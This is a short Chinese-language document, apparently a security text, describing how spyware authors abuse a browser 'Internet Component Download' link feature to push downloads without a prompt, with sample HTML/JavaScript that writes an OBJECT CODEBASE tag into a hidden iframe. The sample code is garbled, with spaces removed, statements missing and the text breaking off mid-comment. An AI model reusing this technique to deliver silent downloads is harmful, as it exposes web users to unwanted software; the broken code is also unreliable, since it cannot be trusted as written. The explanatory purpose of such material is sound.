利用互联网程序代码下载链接功能.doc

实例4利用“互联网程序代码下载链接”功能间谍软件攻击者会根据Microsoft网站上的知识库文章中贴出的某段样本程序代码来利用“互联网程序代码下载链接”功能。浏览带有此间谍软件的站点时,工作站会在没有文件下载提示的情况下接受恶意下载(就像已签署了安全性一样)。根据浏览器的安全性设定值,“安全警告”并不一定会显示。以下样本程序代码提供一个使用“互联网程序代码下载链接”功能的范例:<HTML><HEAD><TITLE>Pageofexecutablelinks</TITLE></HEAD><BODY><BR/><!--hyperlinkusescentralscriptfunctioncalledlinkit()--><AHREF=""onclick="returnlinkit('');"></A><SCRIPT>//linkitputsfilenameintoHTMLcontentandspewsitintoiframefunctionlinkit(filename){strpagestart="<HTML><HEAD></HEAD><BODY><OBJECTCLASSID="+"'CLSID:15589FA1-C456-11CE-BF01-00AA0055595A'CODEBASE='";strpageend="'></OBJECT></BODY></HTML>";();(strpagestart+filename+strpageend);="Done.";returnfalse;//stophyperlinkandstayonthispage}</SCRIPT><!--hiddeniframeusedforinsertinghtmlconte